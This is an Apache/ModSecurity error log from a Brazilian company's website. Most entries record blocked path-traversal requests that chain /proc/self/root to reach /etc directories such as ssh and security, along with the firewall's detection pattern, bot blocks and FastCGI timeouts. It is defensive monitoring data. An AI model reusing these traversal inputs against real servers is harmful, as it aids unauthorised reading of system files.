[Tue Mar 17 21:03:23.061205 2026] [:error] [pid 25836:tid 140411674785536] [client 74.7.228.61:35548] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnry4h-PF_25v4hFRCSZQAAAQg"]
[Tue Mar 17 21:03:30.869796 2026] [proxy_fcgi:error] [pid 25836:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:55454] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:03:51.841172 2026] [core:alert] [pid 31803:tid 140411649607424] [client 74.7.243.128:59060] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/usr/lib/kbd
[Tue Mar 17 21:03:54.049838 2026] [proxy_fcgi:error] [pid 6296:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:55878] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:04:05.452845 2026] [:error] [pid 6296:tid 140411683178240] [client 74.7.243.128:41296] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnr9XIk7brgkOH-rIW0NwAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:04:10.138750 2026] [:error] [pid 17653:tid 140411691570944] [client 216.73.216.191:17550] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnr-sdf6f5d65gmYZRkLwAAAsY"]
[Tue Mar 17 21:04:10.355851 2026] [:error] [pid 17653:tid 140411641214720] [client 216.73.216.191:17550] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnr-sdf6f5d65gmYZRkMAAAAsw"]
[Tue Mar 17 21:04:18.121888 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56318] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:04:42.137849 2026] [proxy_fcgi:error] [pid 2598:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:56796] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:05:04.417844 2026] [proxy_fcgi:error] [pid 29151:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:57248] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:05:12.070323 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:38596] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnsONa6ubjKNq_cu4YuUQAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:05:15.323051 2026] [:error] [pid 25836:tid 140411616036608] [client 74.7.243.128:48366] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnsO4h-PF_25v4hFRCSiQAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:05:19.807582 2026] [:error] [pid 11088:tid 140411548894976] [client 74.7.243.128:48374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnsP2mqtCojLHvu5cKQfQAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:05:28.157823 2026] [proxy_fcgi:error] [pid 31803:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:57716] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:05:31.084281 2026] [:error] [pid 29151:tid 140411632822016] [client 216.73.216.191:58327] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnsS_PqhzTj3BvfDX-wmAAAAc0"]
[Tue Mar 17 21:05:54.353832 2026] [proxy_fcgi:error] [pid 6296:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58198] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:06:06.342088 2026] [:error] [pid 6296:tid 140411658000128] [client 74.7.243.128:35654] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnsbXIk7brgkOH-rIW0ZgAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:06:17.506588 2026] [proxy_fcgi:error] [pid 2598:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58670] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:06:21.805814 2026] [mime_magic:error] [pid 17653:tid 140411658000128] (70014)End of file found: [client 74.7.241.31:55044] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/libexec
[Tue Mar 17 21:06:21.805958 2026] [access_compat:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:55044] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/libexec
[Tue Mar 17 21:06:39.129849 2026] [proxy_fcgi:error] [pid 11088:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:59268] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:07:01.132641 2026] [proxy_fcgi:error] [pid 19507:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:59934] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:07:22.050301 2026] [proxy_fcgi:error] [pid 17653:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60472] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:07:23.159333 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:55308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnsu8df6f5d65gmYZRkkAAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:07:44.125814 2026] [proxy_fcgi:error] [pid 11088:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:60902] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:08:07.165971 2026] [proxy_fcgi:error] [pid 31803:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:33216] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:08:19.355847 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:49626] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abns88df6f5d65gmYZRk1QAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:08:20.011338 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.244.43:46836] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abns9OyqAr6etmhZHNpPAAAAAFE"]
[Tue Mar 17 21:08:22.011632 2026] [:error] [pid 6296:tid 140411741927168] [client 74.7.241.31:48618] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abns9nIk7brgkOH-rIW0iwAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:08:23.969054 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:48622] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abns99a6ubjKNq_cu4YumwAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:08:26.960497 2026] [:error] [pid 6296:tid 140411599251200] [client 74.7.228.61:35600] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abns-nIk7brgkOH-rIW0jQAAAVE"]
[Tue Mar 17 21:08:30.155159 2026] [proxy_fcgi:error] [pid 25836:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33656] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:08:52.150130 2026] [proxy_fcgi:error] [pid 6296:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34184] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:09:02.868341 2026] [:error] [pid 31803:tid 140411658000128] [client 216.73.216.191:19251] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abntHuyqAr6etmhZHNpPFAAAAEo"]
[Tue Mar 17 21:09:15.122668 2026] [proxy_fcgi:error] [pid 11816:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:34692] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:09:39.122402 2026] [proxy_fcgi:error] [pid 11816:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35206] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:10:02.154484 2026] [proxy_fcgi:error] [pid 29151:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:35788] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:10:06.116580 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:55308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abntXsdf6f5d65gmYZRlIgAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:10:14.205219 2026] [:error] [pid 25836:tid 140411590858496] [client 74.7.243.128:51824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abntZoh-PF_25v4hFRCS9gAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:10:23.129895 2026] [proxy_fcgi:error] [pid 11816:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:36258] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:10:45.130736 2026] [proxy_fcgi:error] [pid 6296:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:36744] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:11:08.033878 2026] [proxy_fcgi:error] [pid 2598:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:37266] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:11:30.129867 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37894] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:11:53.150051 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:38592] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:12:16.129822 2026] [proxy_fcgi:error] [pid 31803:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:39138] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:12:38.061899 2026] [proxy_fcgi:error] [pid 29151:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:39584] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:12:59.121779 2026] [proxy_fcgi:error] [pid 31803:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40044] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:13:21.140385 2026] [proxy_fcgi:error] [pid 25836:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:40562] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:13:22.148031 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.244.43:49166] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnuItY0UrI5A3LftIwn4AAAAYs"]
[Tue Mar 17 21:13:27.009315 2026] [:error] [pid 6296:tid 140411733534464] [client 74.7.228.61:37610] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnuJ3Ik7brgkOH-rIW0-QAAAUE"]
[Tue Mar 17 21:13:43.137854 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41072] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:14:06.113561 2026] [proxy_fcgi:error] [pid 29151:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:41664] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:14:09.881623 2026] [:error] [pid 31803:tid 140411683178240] [client 216.73.216.191:44374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnuUeyqAr6etmhZHNpPhwAAAEc"]
[Tue Mar 17 21:14:29.129865 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42308] AH01075: Error dispatching request to : (polling)
